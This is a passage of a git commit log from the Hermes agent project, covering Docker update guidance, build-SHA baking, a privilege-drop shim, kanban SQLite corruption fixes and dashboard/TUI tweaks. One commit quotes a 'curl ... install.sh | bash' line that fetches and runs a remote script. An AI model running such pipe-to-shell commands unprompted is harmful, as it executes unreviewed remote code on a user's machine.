  - the rev-list parsing later in the flow (`int(stdout.strip())`)
    succeeds rather than `ValueError`-ing through the test's
    SystemExit catch
  - the flow proceeds far enough to confirm the docker banner is
    absent (the actual assertion)

Also broaden the except clause to `(SystemExit, Exception)`: the only
assertion in this test is the negative-banner check on captured stdout;
any further failure in the rest of the update flow is irrelevant to
that contract.

Verified locally: all 7 tests in
`tests/hermes_cli/test_cmd_update_docker.py` pass in 0.39s (previously
the regression-guard test alone consumed 30s+ and got SIGTERM'd).
2026-05-28 15:50:25 +10:00
Ben b924b22a9d fix(docker): hermes update prints docker pull guidance instead of bogus git error
Inside the published Docker image, `hermes update` was hitting the
".git missing → reinstall via curl" fallback:

    ✗ Not a git repository. Please reinstall:
      curl -fsSL https://raw.githubusercontent.com/.../install.sh | bash

That message is wrong on two counts:
  1. It tells the user to run the host-side installer, which would
     install a *new* Hermes on the host — not update the running
     container.
  2. It doesn't mention `docker pull` at all, leaving Docker users
     to figure out the right action from scratch.

`hermes update --check` was worse: it bailed with "Not a git
repository — cannot check for updates." and nothing else.

Fix: detect the Docker install method (already stamped by
`docker/stage2-hook.sh` and surfaced by `detect_install_method()`)
in both update entry points and print a long-form message that
covers:

  - The right command: `docker pull nousresearch/hermes-agent:latest`
  - Restart guidance (`docker compose up -d --force-recreate` /
    re-run `docker run`)
  - How to verify the new version after restart
  - Tag-pinning caveat (`:latest` doesn't move a pinned tag)
  - Config persistence across upgrades (state under `HERMES_HOME` /
    `/opt/data` is bind-mounted and survives)
  - Fork escape hatch (build your own image with the repo's Dockerfile)

Exit code is 1 (matches `managed_error` semantic for "tried to
update but can't update this way").

Plumbing:
  - hermes_cli/config.py: new `format_docker_update_message()` helper
    sits next to the existing `_NIX_UPDATE_MSG` /
    `format_managed_message()` family so the wording lives in one
    place and both call sites (apply path + check path) consume it.
  - hermes_cli/main.py:
      * `cmd_update()`: bail right after the `is_managed()` gate, before
        any of the apply-path branches.
      * `_cmd_update_check()`: bail at the top of the function, before
        the existing `method == "pip"` branch.
    Neither path touches subprocess.run / git when method == "docker".

Coverage:
  - 7 new tests in `tests/hermes_cli/test_cmd_update_docker.py`:
      * `hermes update` in Docker → message + exit 1, no git calls
      * `hermes update --check` (via cmd_update) → same
      * `--yes` / `--force` don't bypass (intentional)
      * `_cmd_update_check` called directly → bails too
      * git/pip installs still take their normal paths (regression guards)
      * `format_docker_update_message` content-lock test pinning the
        five user-actionable bits the message must contain
  - Existing test_cmd_update.py (21 tests) + test_managed_installs.py
    (5 tests) still pass — no regression on the source-install path.
  - Verified end-to-end in a real container: `docker run ... update`
    and `docker run ... update --check` both render the message and
    exit 1.
2026-05-28 15:50:25 +10:00
stephenschoettler 4a6f1863ac test: cover ci-unblocker production regressions
Snapshot review_agent._session_messages before teardown so close() can
clean per-session state without dropping the user-visible
self-improvement summary. Adds two regressions:

- bg-review summarizer receives captured review-agent tool messages
  after review_agent.close() runs
- context-compressor protected-head handoff rehydration populates
  _previous_summary and keeps the old handoff out of newly summarized
  turns

Salvaged from PR #26039 onto current main after agent/background_review.py
extraction. Original commit 63eaf6055; bg-review test updated to patch
the module-level summarize_background_review_actions in
agent.background_review instead of the now-forwarder
AIAgent._summarize_background_review_actions.
2026-05-27 22:14:53 -07:00
Ben 66489f38c7 fix(docker): bake build-time git SHA into the image
`hermes dump` and the startup banner both call `git rev-parse HEAD` to
report the running commit, but `.dockerignore` line 2 excludes `.git` —
so inside the published image `hermes dump` shows
`version: ... [(unknown)]` and the banner drops its `· upstream <sha>`
suffix entirely.  That makes support triage from container bug reports
impossible: we can't tell which commit the user is actually running.

Fix: thread the build-time SHA through as a Docker build-arg, write it
to `/opt/hermes/.hermes_build_sha` in the image, and have a new
`hermes_cli/build_info.get_build_sha()` read it as a fallback after the
existing live-git lookup fails.  Output format is unchanged in both
callsites — same 8-char short SHA whether resolved live or baked.

Wiring:
  - Dockerfile: `ARG HERMES_GIT_SHA=` + write-file step after the source
    copy.  Empty/missing arg → no file written → callers fall through to
    live git (so local `docker build` without --build-arg is unchanged).
  - docker-publish.yml: passes `HERMES_GIT_SHA=${{ github.sha }}` on all
    four build-push-action steps (amd64/arm64, smoke-test + final push).
  - dump.py:_get_git_commit() / banner.py:get_git_banner_state(): try
    live git first, fall back to baked SHA, then to legacy `(unknown)`
    / None.  Banner returns `upstream == local, ahead=0` because a built
    image is by definition pinned to one commit.

Coverage:
  - Unit tests cover build_info (file present/absent/empty/error,
    truncation, whitespace), dump (live-git wins, both fallbacks,
    identical output-format regression guard), and banner (no-repo +
    baked, no-repo + no-sha, shallow-clone fallback).
  - tests/docker/test_dump_build_sha.py is an integration regression
    guard that runs against the real image, reads
    `/opt/hermes/.hermes_build_sha`, and asserts `hermes dump` surfaces
    its content (or stays at `(unknown)` if no file).
  - Verified end-to-end: `docker build --build-arg HERMES_GIT_SHA=abc...`
    → `docker run ... dump` reports `[abc12345]`; without the build-arg
    it reports `[(unknown)]` as before.
2026-05-28 15:14:05 +10:00
teknium1 ebe04c66cd fix(kanban): close kanban.db FD after every connect() in long-lived processes
`sqlite3.Connection.__exit__` commits/rollbacks but does NOT close the
underlying FD. `with kb.connect() as conn:` in long-lived processes
(gateway `run_slash`, dashboard `decompose_task_endpoint`) therefore
leaks one FD to `kanban.db` per call. After enough operations the
gateway dies with `[Errno 24] Too many open files` (~4 days uptime
in the production report — #33159).

Fix: add a `connect_closing()` context manager in `hermes_cli/kanban_db`
that wraps `connect()` with a real `try/finally: conn.close()`. Switch
the 42 leak-prone call sites in `hermes_cli/kanban.py` (35),
`hermes_cli/kanban_decompose.py` (4), and `hermes_cli/kanban_specify.py`
(3) over to it.

`kanban.py` matters because `run_slash` (called from the gateway for
every `/kanban` slash command) parses argparse and dispatches to those
`_cmd_*` functions in-process — each one was leaking one FD per
invocation.

Tests inside `tests/` are untouched: short-lived processes where OS
cleanup masks the leak. Regression tests added in
`test_kanban_db.py` cover both happy-path and exception-path closure,
plus an explicit assertion that bare `with kb.connect()` still does
NOT close (documenting the upstream sqlite3 behaviour we're working
around).

Closes #33159.
2026-05-27 22:07:49 -07:00
Teknium 6d947e4d78 feat(image_gen/fal): add Krea 2 Medium + Large to FAL catalog (#33506)
fal announced Krea 2 day-0 as an official API partner on 2026-05-27.
Add both variants to the FAL_MODELS catalog so they appear in the
'hermes tools' model picker alongside flux-2, gpt-image, nano-banana,
etc. Users who already bill through FAL or Nous Portal subscription
can now use Krea without registering directly with Krea.

Model IDs (as listed in fal's launch announcement):
  fal-ai/krea/v2/medium/text-to-image  — $0.030 / image
  fal-ai/krea/v2/large/text-to-image   — $0.060 / image

Both share the same parameter schema:
  - aspect_ratio (1:1, 4:3, 3:2, 16:9, 2.35:1, 4:5, 2:3, 9:16)
    mapped from our 3 abstract ratios via size_style='aspect_ratio'
  - creativity (raw|low|medium|high; default medium)
  - seed (reproducibility)
  - image_style_references (up to 10 per Krea's API spec)

No num_inference_steps / guidance_scale / num_images — Krea 2 does
not expose those, and the supports-set filter strips them defensively
if the agent ever passes them.

This is the FAL-routed variant. The separate native-Krea-API plugin
shipped in PR #33236 (plugins/image_gen/krea/) remains available for
users who want to bill directly through Krea's API with their own
key. Both routes converge on the same underlying model.

Nous Portal managed-FAL gateway: this commit makes the model IDs
known to the catalog and the picker. The Portal team will need to
allowlist these two endpoint slugs on the fal-queue origin server-side
for them to flow through the managed billing path.
2026-05-27 21:42:52 -07:00
Wesley Simplicio 10f13c3881 fix(web): allow mobile dashboard scrolling (#28051) (#28577)
* fix(web): allow mobile dashboard scrolling

* fix(web): combine mobile root scroll rules

---------

Co-authored-by: Wesley Simplicio <wesley.simplicio.ext@siemens-energy.com>
2026-05-28 00:02:50 -04:00
Austin Pickett c9410b3462 feat(web): add collapsible sidebar for the dashboard (#33421)
* feat(web): add collapsible sidebar for the dashboard

The desktop sidebar can now be collapsed to an icon-only rail via a
toggle button in the sidebar header.  State is persisted in
localStorage so it survives page reloads.

When collapsed (lg+ only):
- Sidebar shrinks from w-64 to w-14 with a smooth width transition
- Nav items show only their icon with a native title tooltip
- Brand text, plugin headings, system actions, theme/language
  switchers, auth widget, and footer are hidden
- Mobile drawer behavior is unchanged (always full-width)

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(web): align sidebar tooltips to sidebar edge consistently

Tooltip left position now uses the sidebar's right edge instead of the
anchor element's right edge, so narrow anchors (theme/language switchers)
align with full-width anchors (nav links, system actions).

Co-authored-by: Cursor <cursoragent@cursor.com>

* feat(web): add tooltip animations, restore theme label, rename Sessions tab

- Sidebar tooltips now animate in with a subtle 120ms ease-out slide;
  subsequent tooltips within the same hover sequence appear instantly
  (no delay/animation) following Emil Kowalski's tooltip pattern
- Restore theme name label when sidebar is expanded
- Rename Sessions segment tab to "History" across all 16 locales

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(web): smooth sidebar collapse animation

- Remove icon centering on collapse; icons stay left-aligned at px-5
  so they don't jump during the width transition
- Text labels fade out with opacity transition instead of instant
  display:none, clipped naturally by overflow-hidden
- Slow collapse duration from 450ms to 600ms for a more relaxed feel
- Gateway dot always rendered with opacity toggle so it doesn't
  slide in from the right on collapse
- Pin gateway dot at fixed left offset (pl-[1.625rem]) to align
  with nav icons
- Align header toggle button with justify-center when collapsed
- Bottom switchers use items-start when collapsed to prevent reflow

Co-authored-by: Cursor <cursoragent@cursor.com>

---------

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-27 23:58:41 -04:00
Dusk c341a2d107 fix(docker): align HOME for dashboard and s6 gateway services (#33481) 2026-05-28 13:42:27 +10:00
teknium1 71b4a6b18e fix(docker): install python-is-python3 so bare python resolves in containers
Debian 13 ships only `python3` — there's no `/usr/bin/python` symlink. When
the agent emits bash commands using bare `python` (which models do frequently
from their training prior), every such call fails with:

    /usr/bin/bash: python: command not found
    Tool terminal returned error … exit_code 127

The agent then retries with different approaches, sessions take longer, and
agent.log fills with WARNING noise.

`python-is-python3` is the standard Debian package that drops a
`/usr/bin/python → python3` symlink. ~30 KB, zero behavior change for
anything calling `python3` directly; transparent fix for everything else.

Fixes #33178.
2026-05-28 13:37:17 +10:00
Ben Barclay aeb992d343 fix(docker): drop docker exec to hermes uid before invoking the CLI
When operators ran `docker exec <c> hermes login` (or anything else
that wrote under $HERMES_HOME) they defaulted to root, leaving
/opt/data/auth.json root:root mode 0600. The supervised gateway
(UID 10000) then couldn't read its own credentials and returned
"Provider authentication failed: Hermes is not logged into Nous
Portal" on every Telegram/Discord/etc. message — even though
`docker exec <c> hermes chat -q ping` (also root) succeeded because
root could read its own root-owned file. _load_auth_store swallowed
PermissionError as a parse failure and copied the file aside as
auth.json.corrupt, making the diagnostic more misleading.

Fix: install a privilege-drop shim at /opt/hermes/bin/hermes,
prepended ahead of the venv on PATH. When invoked as root the shim
exec's the real venv binary via `s6-setuidgid hermes` — so any file
the docker-exec session writes is uid-aligned with the supervised
processes. Non-root callers (the supervised processes themselves,
`docker exec --user hermes`, kanban subagents, anything inside the
container that's not coming through docker-exec) hit a single exec
to the absolute venv path with no privilege change.

Recursion is impossible: the shim exec's the venv binary by
absolute path (/opt/hermes/.venv/bin/hermes), so the second hop
cannot re-enter the shim regardless of PATH state. No sentinel env
var needed (unlike #33583's gateway-run redirect which DOES need
HERMES_S6_SUPERVISED_CHILD because there's no absolute-path
equivalent for the s6 dispatch).

Opt-out: `docker exec -e HERMES_DOCKER_EXEC_AS_ROOT=1 …` for
diagnostic sessions where the operator deliberately wants root.
Strict truthiness (1/true/yes case-insensitive); typos like `=0`
do not silently opt out, mirroring HERMES_GATEWAY_NO_SUPERVISE in
#33583.

If `s6-setuidgid` is missing (someone stripped s6-overlay in a
downstream fork), the shim exits 126 with a remediation message
pointing at `--user hermes` and the opt-out — never silently runs
as root.

Test plan:
- tests/docker/test_docker_exec_privilege_drop.py — 11 tests
  - shim drops root to hermes uid (file ownership check)
  - shim short-circuits for non-root docker exec
  - HERMES_DOCKER_EXEC_AS_ROOT=1 keeps root
  - strict-truthiness parametrization (5 falsy values reject)
  - main CMD path unaffected (recursion guard)
  - E2E: every file written by docker-exec is readable by uid 10000
- Full tests/docker/ harness: 32/32 pass against fresh image build
- shellcheck --severity=error: clean
- hadolint: clean
- Manual: reproduced the original symptom (root-owned auth.json)
  by bypassing the shim; confirmed default docker-exec produces
  hermes-owned files; confirmed opt-out env keeps root semantics.

Known follow-up: this prevents NEW instances of the bug. Volumes
that already have root:root /opt/data/auth.json from a pre-shim
image need a one-time `chown hermes:hermes` before rebooting onto
the new image. A stage2-hook chown sweep can self-heal that, but
is deferred per scope decision.
2026-05-28 13:30:36 +10:00
Ben Barclay b345323195 fix(docker): tee supervised gateway stdout to docker logs
Follow-up to #33583 (the gateway-run-supervised redirect).

Before this fix, the supervised gateway's stdout (most visibly the
"Hermes Gateway Starting…" rich-console banner) was swallowed by
`s6-log` into the rotated file at
`${HERMES_HOME}/logs/gateways/<profile>/current` and never reached
`docker logs`. Operational signal lived in two places:

  * **docker logs** — saw stderr (Python `logging` defaults to
    stderr), so warnings/errors were visible.
  * **the rotated file** — saw stdout (rich banners, `print()`
    output, third-party libs that wrote to fd 1).

This was surprising for users coming from the pre-s6 image, where
`docker run … gateway run` produced a single unified stream in
`docker logs`. They'd see partial output, conclude something was
broken, and dig around for the missing pieces.

Fix: add the `1` s6-log action directive before the file destination
so each line is forwarded to s6-log's stdout — which propagates up
the s6-supervise pipeline to /init's stdout = container stdout =
`docker logs`. The file destination is preserved as a second
destination, so the rotated log (with ISO 8601 timestamps) still
exists for `hermes logs` and for survival across container restarts.

Trade-off considered: timestamps. Putting `T` between `1` and the
file destination (not before `1`) means:

  * docker logs sees raw lines — Python's logging formatter has its
    own timestamps, and `docker logs --timestamps` adds another
    layer when desired. No double-stamping in the common reading
    path.
  * The persisted file gets s6-log's ISO 8601 timestamp so even
    output that lacked a Python-logger timestamp (rich banners,
    third-party raw prints) is correlatable in `current`.

Verification:

  * New unit-test assertion in `test_service_manager.py` locks the
    `s6-log 1` directive into the rendered run-script. Mutation-
    tested by reverting to the pre-fix script (no `1`); the assert
    catches it cleanly.
  * New docker-harness test `test_supervised_gateway_stdout_reaches_docker_logs`
    builds the image, runs `docker run … gateway run`, and asserts
    the unique `⚕` banner glyph reaches `docker logs`. Also verifies
    the rotated file still contains the banner (no regression on
    the existing file destination). Mutation-tested end-to-end: built
    a deliberately-broken image without the `1` directive and the
    test failed exactly as designed, citing the banner present in
    `current` but absent from `docker logs`.
  * `website/docs/user-guide/docker.md` gains a new `:::note Where
    gateway logs go` admonition documenting both destinations and
    the audit-log file at `${HERMES_HOME}/logs/container-boot.log`.

Existing functionality preserved: every other docker-harness test
still passes against the new image. Unit-test sweep across
`tests/hermes_cli/` (5561 tests) is green.
2026-05-28 13:18:41 +10:00
brooklyn! 912e6e2274 fix(tui): suppress mouse-residue leaks during Python launcher startup (#31213)
* fix(tui): suppress mouse-residue leaks during Python launcher startup

`hermes --tui …` spends ~100–300ms inside the Python launcher (lazy
imports, arg parsing, session resolution) before exec'ing the Node TUI
binary. During that window stdin is still in cooked + echo mode. If a
prior session left DEC mouse tracking asserted (or the user spammed
mouse movement while the previous session was opening), the terminal
keeps emitting `\\x1b[<…M` SGR motion reports that get echoed straight
back into the user's shell scrollback as literal `^[[<…M` text and
sit there above the TUI banner until the next clear.

The Node side already calls `resetTerminalModes()` in `entry.tsx`, but
by then the race is already lost — the bytes echoed during the Python
warmup window were committed to the scrollback before Node started.

Fix: write the mouse-tracking disable sequence at the very top of
`hermes_cli.main`, before every heavy import. The terminal stops
emitting motion events as soon as the bytes hit the wire (one TTY
round-trip), shrinking the race window from hundreds of milliseconds
to a few. `HERMES_TUI_NO_EARLY_DISABLE=1` opts out for diagnostics.

* test(tui): drop dead _reload_main, hoist import out of patch context

Addresses Copilot review on PR #31213.

The tests used to import `hermes_cli.main` inside the `patch("os.write")`
context, which Copilot pointed out is order-dependent: if the module
is already loaded (e.g. imported by a prior test in the same process),
the import is a no-op and the patch only sees the explicit
`_suppress_mouse_residue_early()` call. Either way the assertion can
flake when run alongside other tests.

Move the import to module scope — every subprocess gets a fresh
`hermes_cli.main`, whose module-level invocation is a no-op under
pytest argv. Tests then exercise `_suppress_mouse_residue_early()`
directly inside their own patch context. Also drop the unused
`_reload_main` helper.

* fix(tui): skip early mouse-disable when stdout is not a TTY

Addresses Copilot review on PR #31213.

`hermes --tui … >log` or CI capture pipes fd 1 away from the terminal.
The disable bytes can't reach the terminal in that case but would
still get written into the log file as raw CSI sequences. Guard with
`os.isatty(1)` inside the existing `try/except OSError` block so the
'never break startup' contract holds.

* docs(tui): rephrase 'raw cooked mode' as 'cooked + echo mode'

Copilot review nit on PR #31213 — the original wording was self-
contradictory. Pre-TUI stdin state is cooked + echo (kernel TTY
discipline still owns the line buffer and echoes input back). The
TUI switches it to raw mode later when Ink mounts.
2026-05-27 22:03:45 -05:00
Ben Barclay 0927fb5584 feat(docker): auto-redirect gateway run to supervised mode inside s6 image
Pre-s6, `docker run nousresearch/hermes-agent gateway run` was the
standard invocation: gateway ran as the container's main process,
tini reaped zombies, container exit code matched gateway exit code,
no supervision. With s6-overlay as PID 1, the same invocation now
auto-upgrades to supervised semantics — auto-restart on crash,
dashboard supervised alongside (when HERMES_DASHBOARD=1 is set),
multiple profile gateways under the same /init.

Users get the new behavior with zero changes to their docker run
command. A loud one-line breadcrumb on stderr explains the upgrade
and points at the opt-out for users who genuinely want pre-s6
foreground semantics.

How it works:

  1. `_gateway_command_inner` (the `gateway run` handler) checks if
     we're inside a container with s6 as PID 1.
  2. If yes, dispatches `start` to the s6 service manager (registers
     and starts gateway-default), then `exec sleep infinity` to keep
     the CMD process alive without binding container lifetime to
     gateway PID lifetime. The supervised gateway can flap freely;
     `docker stop` still tears everything down via /init stage 3.
  3. If no, falls through to the existing foreground code path
     unchanged. Host runs of `hermes gateway run` are unaffected.

Three gates make the redirect inert outside the intended scope:

  * `detect_service_manager() != "s6"` — host/non-s6-container runs.
  * `HERMES_S6_SUPERVISED_CHILD=1` env var (recursion guard) —
    exported by `S6ServiceManager._render_run_script` for the
    s6-supervised invocation itself. Without this guard, the
    supervised `gateway run --replace` would re-enter the redirect
    and recurse (run → start → run → start → ...) infinitely.
  * `--no-supervise` CLI flag OR `HERMES_GATEWAY_NO_SUPERVISE=1` env
    var — explicit user opt-out for CI smoke tests, debugging the
    foreground startup path, or any case wanting "CMD exit =
    container exit" semantics. Strict truthiness (1/true/yes,
    case-insensitive); typos like `=0` do NOT silently opt out.

Tests:

  * Unit tests in tests/hermes_cli/test_gateway_s6_dispatch.py
    cover all five paths (host no-op, supervised fire, sentinel
    recursion guard, CLI flag, env var truthy + falsy). The two
    load-bearing gates (sentinel + opt-out) were mutation-tested
    by removing each gate in isolation and confirming the dedicated
    test fails with the expected error.
  * Docker harness tests in tests/docker/test_gateway_run_supervised.py
    cover the round trips end-to-end against a built image: redirect
    fires (sleep-infinity heartbeat + supervised gateway-default
    slot + breadcrumb), --no-supervise opt-out (foreground gateway,
    no want-up on the slot), HERMES_GATEWAY_NO_SUPERVISE env var
    works identically, recursion is impossible (≤1 supervised
    python gateway-run + exactly 1 sleep-infinity parented to the
    CMD wrapper), and HERMES_DASHBOARD=1 produces both supervised
    gateway and supervised dashboard.

Docs:

  * Added a `:::tip Gateway runs supervised` admonition near the
    main docker.md example explaining the upgrade and pointing at
    the opt-out. Pre-s6 (tini-based) images still run gateway run
    as the foreground main process, so the note is scoped to the
    s6 image only.

Trade-off documented in the helper docstring: container exit code
under the redirect is sleep's exit code (always 0 on SIGTERM), not
the gateway's. That was an explicit design call — the supervised
gateway is allowed to flap without taking the container with it,
which is what "supervision" means. CI users who want exit-code
forwarding can pass --no-supervise.
2026-05-28 12:42:13 +10:00
teknium1 36c99af37a test(kanban): align two tests with recent kanban hardening
Two pre-existing test failures on main, both pointing at code that
was hardened recently — not behaviour bugs, test expectations that
fell out of date.

1. tests/tools/test_kanban_tools.py::test_worker_complete_rejects_stale_run_id
   c002668ff ("fix(kanban): add grace period to detect_crashed_workers")
   gates each running task behind a launch-window grace period so
   freshly-spawned workers whose PID isn't yet visible on /proc don't
   get reclaimed. The test creates a worker_env fixture moments before
   asserting reclamation, so the default 30s grace skips the liveness
   check and detect_crashed_workers returns []. Fix: set
   HERMES_KANBAN_CRASH_GRACE_SECONDS=0 in the test so we get the
   immediate-reclaim semantics the assertion expects.

2. tests/tools/test_windows_native_support.py::
     TestKanbanWaitpidWindowsGuard::test_source_gates_waitpid_loop
   ffdc937c1 ("fix(kanban): hoist zombie reaper out of dispatch_once")
   reshaped reap_worker_zombies to use an early-return Windows guard
   (\`if os.name == "nt": return []\`) instead of an inverted gate
   (\`if os.name != "nt":\`). Both correctly keep the waitpid loop off
   Windows — the early-return form is stronger because the rest of the
   function never runs. Fix: accept either gate pattern in the source
   scan.

Both failures reproduce verbatim on \`origin/main\` in a clean env;
neither relates to in-flight work on #33564 (the FD-leak fix). Filing
this as a separate fix-it PR per green-CI-policy so the kanban CI
shard stays green for downstream PRs.
2026-05-27 18:26:44 -07:00
kshitijk4poor 2d5dcfabc3 test(kanban): update dispatcher tick counter for hoisted zombie reaper
The reaper hoist in the prior commit adds an extra
`asyncio.to_thread(_kb.reap_worker_zombies)` call at the top of every
dispatcher tick (before the per-board work). The existing
`test_gateway_dispatcher_disables_corrupt_board_without_traceback`
mocks `to_thread` with a 4-call cap that previously matched 2 full
dispatch ticks. With the reaper hoist each tick is now 3
`to_thread` calls instead of 2, so the cap is raised to 6 to preserve
the same number of dispatch ticks. The `connect == 5` assertion is
unchanged.

Also add the contributor's `steveonjava@gmail.com` to AUTHOR_MAP
alongside `steve@steveonjava.com` so contributor-audit passes for
both identities used across the salvaged commits.

Salvage follow-up for PR #32857.
2026-05-27 14:31:55 -07:00
Stephen Chin dc98314fbd fix(kanban): skip redundant WAL pragma on already-WAL connections
apply_wal_with_fallback() issued PRAGMA journal_mode=WAL on every call,
including connections to DBs already in WAL mode. This triggered the WAL
init code path, causing SQLite to acquire EXCLUSIVE, checkpoint, and unlink
kanban.db-{wal,shm}. Other open connections received (deleted) FDs and
raised sqlite3.OperationalError: disk I/O error.

Add a cheap read probe (PRAGMA journal_mode, no flock/checkpoint/unlink)
before the set-pragma path. If already wal, return early. The set-pragma
and DELETE fallback paths are unchanged.

Closes #31158. Addresses root cause that PRs #32226 and #32322 attempted
via connection-sharing/caching approaches.
2026-05-27 14:31:55 -07:00
Stephen Chin ffdc937c18 fix(kanban): hoist zombie reaper out of dispatch_once
Reaper now runs at the top of every dispatcher tick regardless of per-board connect() failures. Previously the reaper sat inside dispatch_once after the kanban_db.connect() call — any EIO during connect would skip reaping for that tick, accumulating zombie workers and stale claim_lock rows.

Also: reap_worker_zombies now returns the list of reaped pids (the dispatcher logs them) and a test indentation fix.

Squashes three sibling commits from PR #32301 into one logical change for batch review.
2026-05-27 14:31:55 -07:00
steveonjava 99c19eb2fe fix(kanban): add post-commit page_count invariant check to write_txn
Reads header bytes 28-31 after every COMMIT and compares against actual file size. Raises sqlite3.DatabaseError on torn-extend (actual_pages < page_count). Also sets PRAGMA wal_autocheckpoint=100 in connect().

Refs: #31208 (Bug E - same file, coordinate), #30973 (wal_autocheckpoint)
Refs: #30445, #30896, #30908 (corruption reports)
2026-05-27 14:31:55 -07:00
Stephen Chin c002668ff0 fix(kanban): add grace period to detect_crashed_workers
`detect_crashed_workers` calls `_pid_alive` on every `running` task whose
claim is held by this host. The check can transiently return False for a
freshly-spawned worker (fork → /proc-visibility lag, or reap-race
between SIGCHLD and parent reaping). When a second dispatcher ticks
inside that window it reclaims the task and spawns a duplicate worker.

Add `DEFAULT_CRASH_GRACE_SECONDS = 30` and an
`HERMES_KANBAN_CRASH_GRACE_SECONDS` env-var override.
`detect_crashed_workers` skips the liveness check when
`time.time() - started_at < grace`. The existing 15-minute claim TTL
still reclaims genuinely-crashed workers; grace only suppresses the
launch-window false positive.

`HERMES_KANBAN_CRASH_GRACE_SECONDS=0` is set on the `kanban_home`
fixture in `test_kanban_core_functionality.py` so existing tests that
assert immediate reclaim retain pre-fix semantics.

Companion to merged PR #23442 (`release_stale_claims`, closes #23025),
which addressed the same multi-dispatcher race in the stale-claim path.
Related: #20015 (`_pid_alive` false-negative behaviour),
2026-05-27 14:31:55 -07:00
Stephen Chin e83252dc46 fix(kanban): preserve original exception when write_txn rollback fails
When code inside a write_txn block raises an OperationalError that SQLite
has already auto-rolled-back (typical for disk I/O error,
database is locked, and database disk image is malformed), the
explicit ROLLBACK in write_txn.__exit__ itself raises
cannot rollback - no transaction is active and the secondary exception
replaces the original in the traceback. Operators see a misleading error
and lose the diagnostic information they need.

Swallow the rollback-time OperationalError so the caller always sees the
original cause.

Confirmed reproducer: tests/hermes_cli/test_kanban_db.py::
test_write_txn_preserves_original_exception_when_rollback_fails
2026-05-27 14:31:55 -07:00
Stephen Chin 5c49cd0ed0 fix(state): never silently downgrade WAL to DELETE on transient EIO
apply_wal_with_fallback() treated "disk i/o error" as a permanent
WAL-incompatibility marker, identical to "locking protocol" (NFS) and
"not authorized" (FUSE). But EIO during PRAGMA journal_mode=WAL is
typically TRANSIENT — page-cache pressure, brief lock contention,
recoverable storage hiccups — not a permanent filesystem property.

Treating transient EIO as a permanent downgrade signal produces the
mixed-journal-mode-across-processes corruption pattern:

  1. Process A opens kanban.db, hits transient EIO on the WAL pragma,
     silently downgrades to journal_mode=DELETE.
  2. Process B (no EIO) opens the same file moments later and
     successfully sets journal_mode=WAL.
  3. A writes rollback-journal frames while B writes WAL frames. SQLite
     documents this as unsupported and corrupts the file:
     https://www.sqlite.org/wal.html ("all connections to the same
     database must use the same locking protocol").

This was the root cause of repeated kanban.db corruption on hosts with
multiple gateway processes plus CLI invocations against the same DB
(observed pattern: corruption shortly after gateway startup, after the
process logged "WAL journal_mode unsupported on this filesystem (disk
I/O error) — falling back to journal_mode=DELETE"). The fallback
warning told the truth — fallback DID happen — but the premise
("unsupported on this filesystem") was wrong; the EIO was a one-shot
event and sibling processes successfully used WAL.

Fix has two layers:

1. Remove "disk i/o error" from _WAL_INCOMPAT_MARKERS. EIO now re-raises
   so callers can retry instead of silently corrupting the DB. The two
   remaining markers ("locking protocol", "not authorized") are
   deterministic per filesystem so they remain safe permanent-downgrade
   signals.

2. Belt-and-suspenders: before downgrading on ANY marker match, peek the
   on-disk journal mode. If the header says WAL, refuse to downgrade and
   re-raise the original error. This guards against any future addition
   to _WAL_INCOMPAT_MARKERS turning out to be transient in some
   environment we haven't yet seen.

Tests:

- tests/test_hermes_state_wal_fallback.py:
  * Flipped test_falls_back_on_disk_io_error → test_reraises_on_disk_io_error
    asserting EIO is re-raised, not silently swallowed.
  * Added test_does_not_downgrade_when_disk_says_wal covering the
    on-disk-header safety guard for the existing legitimate markers.

- tests/hermes_cli/test_kanban_db.py:
  * test_connect_falls_back_to_delete_on_locking_protocol now uses a
    truly-fresh DB (instead of the kanban_home fixture which pre-inits
    in WAL). On NFS the very first process touching the file legitimately
    downgrades; on a file already in WAL the new guard correctly refuses.

A standalone reproducer lives at /tmp/kanban-stress/repro_bugD_eio_wal_downgrade.py
(not committed): without fix the DB silently flips from WAL to DELETE
mid-process; with fix the EIO surfaces and the file stays WAL.

Refs: Bug D in the kanban-corruption investigation series (Bugs A and C
shipped in ebe7374f3 and e02147d5e respectively). Bug D explains every
corruption incident this week including those that survived A's
single-dispatcher mitigation, because every CLI invocation is a
separate process whose WAL pragma can transiently fail.
2026-05-27 14:31:55 -07:00
Stephen Chin 6416dd5187 fix(kanban): harden SQLite against torn-write corruption (secure_delete + cell_size_check + synchronous=FULL)
Production corruption #6 left b-tree pages with zeroed headers but intact old cell content — the Bug E pattern. This fix applies three pragma calls on every connect():

- synchronous=FULL (was NORMAL): closes the WAL-checkpoint reordering window where a crash between WAL commit and main-DB write leaves a partially-written b-tree page header. Cost is <1ms per commit on local SSD; negligible at kanban write volume.

- secure_delete=ON: forces SQLite to zero freed page bytes on disk. If a torn write or hardware fault later corrupts a page, the underlying cell content is zero, so corruption is detectable and no stale rows can resurface as live data.

- cell_size_check=ON: adds a read-side guard so corrupt cells surface as errors at read time rather than as silent wrong-data returns.

All three are connection-scoped and re-applied on every connect(). secure_delete also writes a persistent flag into the DB header on the first call against a fresh DB, making the protection durable across processes for new DBs.

Tests added for all four required cases: each pragma active on a fresh connection, and all three re-applied after close+reopen. Also adds the required negative test (migration path does not reset pragmas).
2026-05-27 14:31:55 -07:00
kshitijk4poor 963d22cde6 test(install): harden uv-python-path regression test against future drift
Self-review follow-ups on the salvage of #22494:

W2 — Added encoding="utf-8" to read_text() calls. scripts/install.sh
contains 48 em-dash ("—") characters and ~1500 non-ASCII bytes total;
on Windows with cp1252 default locale, bare read_text() would raise
UnicodeDecodeError. Project-wide cleanup of the other 11 similar sites
across 5 install_sh test files is deferred to a separate follow-up.

W3 — Bound the branch-containment check by the function body (head
"resolve_install_layout() {" / tail "\n}\n") instead of by "next
`return 0` after the marker". scripts/install.sh has 5 additional
`return 0` statements between resolve_install_layout's first one and
EOF; if a future maintainer hoists the export above another conditional
with its own early-return or inserts an early-return between the marker
and the export, the old assertion still passes while the export is
unreachable. The body-bounded slice makes that class of regression
visible.

Also added more specific assertion messages and a guard for the body
extraction to fail loudly if the function signature ever changes.
2026-05-27 13:55:51 -07:00
Wesley Simplicio 4efb40c325 fix(install): set world-readable uv python dirs for root FHS layout
When installing as root on Linux with the default FHS layout
(/usr/local/lib/hermes-agent), `uv python install` placed the managed
Python under /root/.local/share/uv/python/, which non-root users cannot
traverse.  The shared /usr/local/bin/hermes wrapper then failed for them
with "bad interpreter: Permission denied" when execing the venv python.

